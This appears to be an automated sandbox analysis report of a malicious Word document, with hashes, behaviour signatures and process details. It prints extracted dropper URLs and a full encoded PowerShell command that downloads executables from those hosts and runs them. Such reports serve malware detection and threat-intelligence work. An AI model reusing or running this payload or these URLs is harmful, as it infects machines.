Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    04/05/2024, 20:32

General

  • Target

    145e8f2ffe3225d9620b9d00599ff9d0_JaffaCakes118.doc

  • Size

    188KB

  • MD5

    145e8f2ffe3225d9620b9d00599ff9d0

  • SHA1

    026ac7a4725651bde1c0d1759797ea05721d8089

  • SHA256

    7280c3e2b153e05dfa4498796b2c2b3b7958063c0a0d85c59e7d46bf3ef42053

  • SHA512

    a0cb7e3d1149dbd4354d9c75458ab5a4ce950e1dd2e88e1d0a1724974dd4833040b3af1137621d2fbd0bf64299a7acdf34d76b5275ea1178301c2082e50571b0

  • SSDEEP

    1536:5GGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilWfm9ITmDST/Ephs7p8cEpY/d89:M8rfrzOH98ipg+LTF5

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://amettatravel.com/wp-admin/1/

exe.dropper

http://iqauthority.com/wp-admin/9Id/

exe.dropper

http://www.sifesro.com/wp-includes/o/

exe.dropper

http://oneinsix.com/test/0/

exe.dropper

https://dramacool9.live/scbvq1/sPT/

exe.dropper

http://blog.geekpai.top/rmebw/x/

exe.dropper

https://datxanhmienbac.info/lfb8ii/LmG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\145e8f2ffe3225d9620b9d00599ff9d0_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2908
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABBAHIAbQAwADIAZgBfAD0AKAAnAFcAdQAnACsAKAAnAG0AdgBhAGQAJwArACcAeAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIATwBmAEkAbABFAFwAdwBUAG0AcwBzADkAVgBcAFgAZgA1AFYAVQBnADYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAYABVAHIASQBUAFkAUAByAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAnACsAJwAxACcAKQArACgAJwAyACwAJwArACcAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsAHMAJwApACkAOwAkAE4AcwBqAGkAdwB5AF8AIAA9ACAAKAAnAE0AcwAnACsAJwB3AGUAJwArACgAJwBwACcAKwAnAGgAZAAwAHMAJwApACkAOwAkAEYAdAA4ADgAdwBuAHkAPQAoACcARgBlACcAKwAoACcAbQBiACcAKwAnAG4AJwApACsAJwAxAHQAJwApADsAJABYAGMAcgBkAHkAMQBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAJwArACcAMAB9AFcAdAAnACsAKAAnAG0AcwBzACcAKwAnADkAdgAnACkAKwAnAHsAMAB9AFgAZgA1AHYAdQBnACcAKwAnADYAewAwAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQATgBzAGoAaQB3AHkAXwArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAUQA5AHYAXwBoADQAcwA9ACgAJwBDACcAKwAoACcAYwAnACsAJwB1ADEAJwApACsAKAAnAF8AJwArACcANQBvACcAKQApADsAJABEADIAYwBpAGEAaQBpAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAGMAbABpAEUAbgBUADsAJABZAG0AMQA3AGQAawBsAD0AKAAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGEAbQAnACsAJwBlACcAKwAnAHQAdAAnACsAKAAnAGEAdAByACcAKwAnAGEAJwApACsAKAAnAHYAJwArACcAZQBsACcAKQArACgAJwAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAxACcAKQArACcALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBxAGEAdQB0AGgAJwArACcAbwByAGkAJwArACcAdAB5ACcAKQArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAKAAnAGQAbQAnACsAJwBpAG4AJwArACcALwA5AEkAZAAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AcwBpACcAKwAnAGYAJwArACcAZQAnACkAKwAoACcAcwByACcAKwAnAG8AJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQBuAGMAbAAnACkAKwAoACcAdQAnACsAJwBkAGUAJwApACsAJwBzAC8AJwArACcAbwAnACsAJwAvACoAJwArACcAaAB0ACcAKwAnAHQAcAAnACsAKAAnADoAJwArACcALwAvAG8AJwArACcAbgBlAGkAJwApACsAKAAnAG4AcwAnACsAJwBpAHgAJwApACsAKAAnAC4AYwAnACsAJwBvAG0AJwArACcALwAnACsAJwB0AGUAcwB0AC8AMAAvACcAKQArACgAJwAqAGgAdAB0AHAAJwArACcAcwA6AC8ALwAnACsAJwBkAHIAYQBtACcAKwAnAGEAJwArACcAYwBvACcAKwAnAG8AJwApACsAKAAnAGwAOQAnACsAJwAuACcAKQArACcAbABpACcAKwAnAHYAJwArACgAJwBlAC8AcwAnACsAJwBjAGIAdgAnACsAJwBxADEAJwArACcALwBzAFAAVAAnACkAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAnACsAJwAvAGIAbAAnACkAKwAnAG8AZwAnACsAKAAnAC4AZwBlAGUAawBwACcAKwAnAGEAJwApACsAKAAnAGkALgB0AG8AcAAvAHIAJwArACcAbQAnACkAKwAnAGUAJwArACcAYgB3ACcAKwAoACcALwAnACsAJwB4AC8AKgBoACcAKwAnAHQAdABwACcAKQArACgAJwBzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBkAGEAJwArACcAdAAnACkAKwAnAHgAYQAnACsAJwBuACcAKwAnAGgAJwArACgAJwBtACcAKwAnAGkAZQAnACkAKwAoACcAbgBiACcAKwAnAGEAJwApACsAJwBjAC4AJwArACgAJwBpAG4AZgAnACsAJwBvAC8AbAAnACsAJwBmAGIAJwApACsAJwA4AGkAJwArACgAJwBpAC8AJwArACcATAAnACkAKwAnAG0AJwArACcARwAnACsAJwAvACcAKQAuACIAUwBwAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABMAHIAMABxAGwAMAAwAD0AKAAoACcAWABmADcAJwArACcAdABzACcAKQArACcAcQAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE4AcgB3AHIAeAAyADEAIABpAG4AIAAkAFkAbQAxADcAZABrAGwAKQB7AHQAcgB5AHsAJABEADIAYwBpAGEAaQBpAC4AIgBEAGAAbwBXAE4AbABvAEEARABmAGAASQBgAEwAZQAiACgAJABOAHIAdwByAHgAMgAxACwAIAAkAFgAYwByAGQAeQAxAHMAKQA7ACQATwBrAHUAZgBvAHQAZAA9ACgAJwBBACcAKwAoACcAOAA0ACcAKwAnAHUAJwApACsAKAAnADQAOQAnACsAJwA3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFgAYwByAGQAeQAxAHMAKQAuACIATABgAEUATgBgAEcAdABIACIAIAAtAGcAZQAgADIANwA2ADUAMwApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABYAGMAcgBkAHkAMQBzACkAOwAkAFoAdgA4ADMAYwA0AHoAPQAoACgAJwBQAGMAYgAnACsAJwA4ACcAKwAnADAAcgAnACkAKwAnAHgAJwApADsAYgByAGUAYQBrADsAJABSAGYAMQBqAGkAMAA5AD0AKAAnAE8AJwArACgAJwBwAHAAJwArACcAZgBvACcAKQArACcAZwBfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA0AHUANwBpAGUAcwA9ACgAKAAnAFcAZwA1AHEAJwArACcAYgAnACkAKwAnAHMAYwAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2720

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      c9f35568b812f6745ae030e67c099eb0

      SHA1

      b37c4a9a89f71b2e049381d9f97f61068bfd837a

      SHA256

      3b74cc1682e0548113c8a59e4cdf25558c897164a2e81cc2e5786617f7b32209

      SHA512

      7bb3b062bc40f35556fcb108de28208d771aa331868fb232c4d137eebc198a4b7cb2c35bb202ba5afb10af8cddeb38d4f3b42c24c4cc95e21ce2f0846546563b

    • memory/2364-20-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-23-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-6-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-7-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-8-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-9-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-11-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-12-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-15-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-26-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-14-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-13-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-17-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-10-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-18-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-21-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-22-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-0-0x000000002FDF1000-0x000000002FDF2000-memory.dmp

      Filesize

      4KB

    • memory/2364-2-0x000000007196D000-0x0000000071978000-memory.dmp

      Filesize

      44KB

    • memory/2364-19-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-16-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-25-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-24-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-31-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-32-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-30-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-28-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-27-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-29-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-33-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-69-0x000000007196D000-0x0000000071978000-memory.dmp

      Filesize

      44KB

    • memory/2364-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2364-45-0x000000007196D000-0x0000000071978000-memory.dmp

      Filesize

      44KB

    • memory/2364-48-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-49-0x00000000002F0000-0x00000000003F0000-memory.dmp

      Filesize

      1024KB

    • memory/2364-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2720-40-0x00000000027E0000-0x00000000027E8000-memory.dmp

      Filesize

      32KB

    • memory/2720-39-0x000000001B630000-0x000000001B912000-memory.dmp

      Filesize

      2.9MB